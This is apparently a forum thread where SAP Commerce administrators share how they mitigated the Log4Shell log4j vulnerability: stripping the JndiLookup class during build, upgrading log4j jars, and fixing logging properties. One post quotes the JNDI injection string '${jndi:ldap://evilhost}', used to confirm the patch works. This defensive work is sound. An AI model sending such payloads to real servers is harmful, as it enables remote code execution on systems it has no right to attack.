Hi Adam,

I can confirm that the workaround for Commerce Public Cloud provided by SAP is working.
I added the logic to one of the extension's buildcallbacks.xml, so the affected log4j class will be removed inside of the log4j-core.jar file during build (Replacing OOTB Files)

According to the build release log file, I see the output logging of successful patching:

In addition, the class "JndiLookup" is not available anymore on classpath (checking with HAC):

I also cannot reproduce the JNDI lookup vulnerability when sending/attacking with "${jndi:ldap://evilhost}" requests.

Version: Commerce Cloud System 1905.35

Thanks Adam and Bernhard.

do you have the XML file downloaded from the KBA? The link on the KBA seems to be broken. It takes me to a 404 page.

Or, if you have the steps that were mentioned in the xml, that would be a great help too please.

The link in the Description of the KBA is broken. Click on the Attachments tab and download the XML from there pranavbhartia1

Hi Torsten,

We tried to upgrade with a new version in /platform/ext/core/libs but after replacing the below jars with the 2.15 version, we don't see any logs getting created other than error logs. Since the platform uses log4j-1.2.17 jar and 2.9.1 version, upgrading the api, core, and sl4j only to 2.15 is not working and the log4j-1.2.17 updated version is no longer available. Let me know if you are able to resolve it and the steps you followed for the same.

log4j-api-2.9.0.jar

log4j-core-2.9.0.jar

log4j-slf4j-impl-2.9.0..jar

Best,

Pankaj

Hi pachoudhary,

we only replaced the jars with v2.X.

We also needed to adapt the log4j properties. In our "local.properties" there was for "tomcat.generaloptions" an entry like "-Dlog4j.configuration=log4j_init_tomcat.properties". This configuration file did not exists. We needed to remove it, then logging was working well. I don't know where this configuration entry comes from, but log4j < v2.15 did not have any problems with it.

Our real configuration file ist given by the property "log4j2.config.xml=..." in "local.properties".

Maybe this can help you.

Best regard.

Hi torsten-mittag

We did follow the above steps. however, we got an error.

We are on on-prem hybris 6.3 and we are using Java 8.

We believe this is due to some compatibility issues with Java 9/tomcat versions.

Can you let us know, what Java/tomcat versions you are using in the SAP commerce suite, when you did the steps mentioned above.

I appreciate your help.

Regards,

Bharadwaj

Hi bsridh,

we are using SAP Commerce 2005 (on Prem), Tomcat 8.5 and the SAP JDK:

openjdk 11.0.13 2021-10-18 LTS
OpenJDK Runtime Environment SapMachine (build 11.0.13+8-LTS-sapmachine)
OpenJDK 64-Bit Server VM SapMachine (build 11.0.13+8-LTS-sapmachine, mixed mode)

Best regards,

Torsten

torsten-mittag - Thank you very much !! .. I really appreciate your quick response and your answer is very helpful.

bsridh - Please refer the SAP's document on their Support Trust Center Portal https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025...

They have release an official KBA artical for On-Prem here https://launchpad.support.sap.com/#/notes/3130967

You can take a look and follow the steps as recommended by SAP.

Hi,

For on premise setups is it enough to add it in local.properties or should we add the prop in java.generalOptions?

Hello Roel,

Thank you for your reply, this is only on SAP Cloud ? or is it also applicable to on-premise servers ?

Best regard

roelwelters yes, this is applicable to on-premise